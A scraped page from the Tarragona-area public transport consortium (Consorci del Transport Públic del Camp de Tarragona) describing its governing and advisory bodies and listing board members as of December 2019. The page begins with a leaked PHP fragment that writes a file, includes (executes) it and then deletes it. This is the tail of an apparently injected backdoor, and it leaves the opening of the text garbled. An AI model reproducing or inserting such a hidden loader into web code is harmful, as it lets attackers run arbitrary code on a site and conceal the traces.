");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Organisational structure
Iconos cabecera

Highlights

 • T-12 CardT-12 Card
  For boys and girls from 4 to 12 years old

Estructura organitzativa

Estructura organitzativa

Estructura organizativa

El Consorci del Transport Públic del Camp de Tarragona està format pels següents òrgans de govern, gestió, consulta i assessorament.

Òrgans

Els òrgans del Consorci són els següents:
 • a) De govern:
  President o Presidenta.
  Consell d’Administració.
  Comitè Executiu.
 • b) De gestió:
  Gerent.
 • c) Òrgans de consulta i participació:
  Consell territorial de la mobilitat de l’ATMCT
 • d) Òrgans d'assessorament:
  Comissió tècnica d'operadors de transport públic
  Comissió d’Assessorament Jurídic.
  Comissió Tècnica.
  Comissió Econòmica.

Òrgans de govern

 • President o Presidenta: és el conseller o la consellera del Departament de Territori i Sostenibilitat o persona que designi.
 • Consell d’Administració: és l’òrgan rector del Consorci, el qual dirigeix de manera col·legiada.
 • Comitè Executiu: és l’òrgan reduït de direcció i administració del Consorci, i és constituït per vuit membres que han de ser membres del Consell d’Administració.

Òrgans de gestió

 • Gerent: El gerent desenvolupa la gestió ordinària del Consorci i és nomenat pel Consell d’Administració a proposta del president.

Òrgans de consulta i de participació

Consell territorial de la mobilitat de l’ATM del Camp de Tarragona: és l'òrgan de consulta i participació cívica i social en el funcionament del sistema de transport públic de viatgers i de la mobilitat en l'àmbit competencial de l'ATM del Camp de Tarragona.

Òrgans d’assessorament

 • Comissió tècnica d'operadors de transport públic
 • Comissió d’Assessorament Jurídic
 • Comissió Tècnica
 • Comissió Econòmica

La Comissió tècnica d'operadors de transport públic és l'òrgan d’assessorament del Consorci en qüestions de caràcter tècnic i econòmic.

La Comissió d’Assessorament Jurídic, la Comissió Tècnica i la Comissió Econòmica duen a terme les activitats d’assistència i assessorament jurídic, tècnic i econòmic, respectivament, que requereixin els òrgans de govern del Consorci. La seva composició ha de ser determinada pel Consell d’Administració, garantint la participació de les administracions consorciades.

Secretaria

Segons els estatuts, el Consorci ha de comptar amb una secretaria el responsable de la qual actua com a secretari del Consell d’Administració i del Comitè Executiu.

Organigrama

Membres Consell d’Administració (a 16 de desembre de 2019)

President
David Saldoni de Tena - CV

Vicepresidents
Jordi Fortuny Guinart
Marina Berasategui Canals

Vocals
Benjamín Cubillo Vidal
Josep M. Fortuny Olivé
Trinitat Castro Salomó
David Prat Soto
Oscar Peris Ródenas
Laia Sas i Sabaté
Baptista Capell Solsona
Lluis Angosto Poza
Ramon Font Herrera
Josep Lluís Abella Hortoneda
Pere Granados Carrillo/ David González Cardeña
Xavier Farriol i Roigés
Ramon Ferré Solé
Joan Sans Freixas
Josep Jaume Corsellas Corbella

Secretari observador
Joan Sabaté Borràs

Secretari
Miquel Àngel Bru Esteban

Membres Comitè Executiu (a 16 de desembre de 2019)

Presidenta
Trinitat Castro Salomó - CV

Vocals
Benjamín Cubillo Vidal
Josep M. Fortuny Olivé
Trinitat Castro Salomó
David Prat Soto
Xavier Puig Andreu
Marina Berasategui Canals
Ramon Font Herrera
Xavier Farriol i Roigés

Secretari
Miquel Àngel Bru Esteban

Gerent (a 16 de desembre de 2019)

Joan Manrubia Gibert - CV

 
Anselm Clavé, 1 43004 - Tarragona